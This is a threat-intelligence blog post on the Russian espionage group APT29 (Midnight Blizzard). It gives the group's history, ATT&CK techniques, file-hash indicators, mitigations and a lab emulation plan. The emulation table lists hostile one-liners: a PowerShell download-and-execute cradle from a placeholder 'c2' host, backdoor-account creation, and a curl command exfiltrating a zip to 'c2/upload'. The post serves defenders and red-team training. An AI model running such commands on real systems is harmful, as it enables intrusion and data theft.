APT29 (Midnight Blizzard): Operations, IOCs, Tactics, Detection Strategies
- Mar 7
- 5 min read
Updated: Mar 28
Introduction
APT29, also known as Midnight Blizzard, NOBELIUM, Cozy Bear, The Dukes, Dark Halo, and UNC2452, is a Russian state-sponsored cyber espionage group attributed to the Foreign Intelligence Service of the Russian Federation (SVR). Active since at least 2008, the group has become one of the most searched and referenced nation-state actors in the industry, known for high-impact operations including the 2020 SolarWinds supply chain compromise (affecting 18,000+ organizations), the 2024 breach of Microsoft corporate systems, and large-scale spear-phishing campaigns against government, defense, academia, and NGOs.
In this blog, we explore APT29's tactics, techniques, and procedures (TTPs), provide updated indicators of compromise (IOCs), and share an emulation plan to help defenders detect and mitigate this persistent, well-resourced threat.
APT29's Modus Operandi
APT29 pursues long-term intelligence collection against governments, diplomatic entities, think tanks, IT service providers, and critical infrastructure, with a strong focus on the United States and Europe. The group combines stolen credentials, password spraying, supply chain and trust-chain abuse, and cloud-focused tactics to gain and maintain access. Recent activity emphasizes cloud and hybrid environments, delegated administrative privileges, and signed malicious files (e.g., RDP configuration files) to evade detection and leverage trusted services.
Commonly Used Techniques
Spear-Phishing and Credential Theft: APT29 runs large-scale spear-phishing campaigns using weaponized attachments and links. In October 2024, Microsoft reported campaigns distributing signed Remote Desktop Protocol (RDP) configuration files to thousands of individuals across 100+ organizations in government, academia, defense, and NGOs. Password spraying and use of valid cloud accounts (T1078.004) are common for initial access.
Supply Chain and Trust Exploitation: The group has a history of supply chain operations (e.g., SolarWinds) and abusing trust relationships with service providers. Tactics include targeting on-premises environments to pivot into cloud, exploiting delegated admin and federation (e.g., ADFS), and using custom ADFS-focused malware such as FOGGYWEB and MAGICWEB.
Cloud and Identity Abuse: SVR actors adapt TTPs for cloud-first access: abuse of cloud tokens, device enrollment, and residential proxy infrastructure (T1090.002) for command-and-control (C2) to blend with normal traffic. Account manipulation (T1098) and creation of accounts (T1136) support persistence.
Custom and Commodity Malware: APT29 uses Cobalt Strike Beacon, CozyDuke, and various Duke family implants. Execution often involves PowerShell, WMI, and signed or otherwise trusted file types to reduce suspicion.
Defense Evasion: Use of alternate authentication material (T1550), impersonation (T1656), and exfiltration over C2 channels (T1041) are routinely observed. The group invests in operational security and infrastructure that mimics legitimate traffic.
Recent Activity (2024–2025)
January 2024: Midnight Blizzard attacked Microsoft's corporate systems and other U.S. technology companies, accessing corporate email and source code repositories. The incident underscored the actor's ability to compromise highly secured enterprises.
February 2024: CISA, NCSC-UK, and international partners released advisory AA24-057A, "SVR Cyber Actors Adapt Tactics for Initial Cloud Access," detailing APT29's evolving tactics for gaining and maintaining access in cloud and hybrid environments.
October 2024: Midnight Blizzard conducted a large-scale spear-phishing campaign (starting October 22) using signed RDP configuration files. Emails targeted thousands of users across government, academia, defense, and NGOs, with an assessed goal of intelligence collection.
Ongoing: The group remains among the most active APT actors, with continued focus on transportation, shipping, telecommunications, and government sectors. Threat intelligence vendors consistently rank APT29 in the top tier of state-sponsored activity.
Key Indicators of Compromise (IOCs)
The following IOCs are associated with APT29/Midnight Blizzard campaigns. Infrastructure and hashes rotate; use CISA advisories (e.g., AA24-057A), Microsoft Security Blog, and vendor reports for the latest indicators.
Domains and Infrastructure
APT29 frequently uses residential proxy networks and cloud services for C2 and to obscure origin. Domain patterns often mimic legitimate services or use short-lived registrations.
Refer to CISA AA24-057A and Microsoft's Midnight Blizzard guidance for current domain and URL IOCs; the group rotates infrastructure aggressively.
Authentication and Cloud
Monitor for unusual cloud sign-ins (e.g., geographic anomalies, impossible travel), token theft, and abuse of delegated administrative privileges.
ADFS and federation abuse: watch for FOGGYWEB/MAGICWEB and unexpected token issuance or consent grants.
File and Execution
Signed RDP (.rdp) configuration files used in spear-phishing (2024 campaign). Inspect RDP files for embedded credentials or pointers to attacker-controlled infrastructure.
Cobalt Strike Beacon and Duke-family malware hashes are published in CISA and vendor advisories; maintain an updated feed.
File hashes (SHA-1)
The following SHA-1 hashes are associated with APT29/Midnight Blizzard campaigns—including malware, signed lures and related artifacts. Use them for file-based hunting, blocklisting in EDR or email security, and correlation in your SIEM or threat-intel platform. Because the group frequently retires and replaces infrastructure, treat these as a snapshot and cross-reference CISA advisories and vendor reports for the latest hashes.
SHA-1 |
|---|
395da6d4f3c890295f7584132ea73d759bd9d094 |
72e5fc82b932c5395d06fd2a655a280cf10ac9aa |
75af292f34789a1c782ea36c7127bf6106f595e8 |
76640508b1e7759e548771a5359eaed353bf1eec |
9858d5cb2a6614be3c48e33911bf9f7978b441bf |
Tactics, Techniques, and Procedures (TTPs)
APT29 is tracked as MITRE ATT&CK group G0016. Below is a condensed mapping of techniques commonly associated with Midnight Blizzard:
Category | MITRE ATT&CK ID | Description |
|---|---|---|
Initial Access | T1078.004 | Valid Accounts: Cloud Accounts |
Initial Access | T1566.001 | Phishing: Spear-phishing Attachment |
Initial Access | T1566.002 | Phishing: Spear-phishing Link |
Execution | T1059.001 | Command and Scripting Interpreter: PowerShell |
Execution | T1047 | Windows Management Instrumentation |
Execution | T1204 | User Execution: Malicious Link or File |
Persistence | T1098 | Account Manipulation |
Persistence | T1136 | Create Account |
Persistence | T1547.001 | Boot or Logon Autostart: Registry Run Keys |
Credential Access | T1110.003 | Brute Force: Password Spraying |
Defense Evasion | T1550 | Use Alternate Authentication Material |
Defense Evasion | T1656 | Impersonation |
Command and Control | T1090.002 | Proxy: External Proxy (e.g., residential) |
Exfiltration | T1041 | Exfiltration Over C2 Channel |
Emulation Plan for APT29
Environment Setup
Component | Details |
|---|---|
Active Directory (AD) | 2 Windows Servers + 3 Windows Clients |
Endpoints | 2 Linux, 2 Windows 10/11 |
SIEM/XDR | ELK Stack / Splunk / Microsoft Sentinel |
Network Monitoring | Suricata / Zeek |
Cloud | Azure AD / M365 tenant (lab) for cloud TTPs |
C2 Framework | Cobalt Strike / Covenant |
Emulation Actions
Tactic | Emulation Actions | Tools/Commands |
|---|---|---|
Reconnaissance | OSINT for target emails and cloud usage; identify high-value roles and delegated admin. | theHarvester, O365/enum tools |
Initial Access | Spear-phish with signed RDP file or document; password spray low-complexity accounts. | GoPhish, RDP file lure, SprayingToolkit |
Execution | Run PowerShell implants; use WMI for execution. | IEX (New-Object Net.WebClient).DownloadString('http://c2/payload.ps1') |
Persistence | Add backdoor accounts; Registry Run keys; cloud app consent. | net user backdoor /add; reg add HKCU...\Run |
Credential Access | Dump credentials; abuse cloud tokens; capture NTLM. | Mimikatz, AAD token abuse |
C2 | Use HTTPS C2 via residential proxy or cloud front. | Cobalt Strike, Malleable C2 |
Exfiltration | Exfil over C2 or staged to cloud storage. | curl -F "file=@data.zip" https://c2/upload |
Mitigation Strategies
To defend against APT29 and similar SVR-backed threats:
Identity and Cloud Hardening: Enforce phishing-resistant MFA, conditional access, and least-privilege for cloud and delegated admin. Monitor for impossible travel, token anomalies, and unusual consent or device enrollment.
Email and Endpoint Security: Block or alert on malicious RDP files and unusual attachments. Use EDR to detect PowerShell execution, WMI abuse, and Cobalt Strike/Duke-like behaviors.
Supply Chain and Trust: Harden ADFS and federation; monitor for FOGGYWEB/MAGICWEB and anomalous token issuance. Assess third-party and service-provider access.
Threat Intelligence: Subscribe to CISA advisories (e.g., AA24-057A), Microsoft Security Blog (Midnight Blizzard), and vendor reports. Update IOCs and detection rules regularly; APT29 rotates infrastructure and TTPs.
Conclusion
APT29 (Midnight Blizzard) remains one of the most capable and widely tracked nation-state threat actors, with sustained operations against government, cloud, and enterprise environments. By understanding their TTPs, applying current IOCs, and emulating their behavior in controlled environments, defenders can improve detection and mitigation of this high-impact adversary.
References
Microsoft Security Blog – Midnight Blizzard: Guidance for responders on nation-state attack (Jan 2024): https://www.microsoft.com/en-us/security/blog/2024/01/25/midnight-blizzard-guidance-for-responders-on-nation-state-attack/
Microsoft Security Blog – Midnight Blizzard spear-phishing campaign using RDP files (Oct 2024): https://www.microsoft.com/en-us/security/blog/2024/10/29/midnight-blizzard-conducts-large-scale-spear-phishing-campaign-using-rdp-files/
CISA AA24-057A – SVR Cyber Actors Adapt Tactics for Initial Cloud Access: https://www.cisa.gov/news-events/cybersecurity-advisories/aa24-057a
MITRE ATT&CK – APT29 (G0016): https://attack.mitre.org/groups/G0016/
Microsoft – Midnight Blizzard (actor profile): https://www.microsoft.com/en-us/security/security-insider/midnight-blizzard
Register for instructor-led online courses today! https://www.darkrelay.com/courses
Check out our self-paced learning paths!
Explore our bundled Pricing & Plans for cost-effective options! Buy a course subscription to learn more, hands-on labs and expert-led training included. https://www.darkrelay.com/plans-pricing
Contact us for custom pentesting needs at: info@darkrelay.com or WhatsApp.
Comments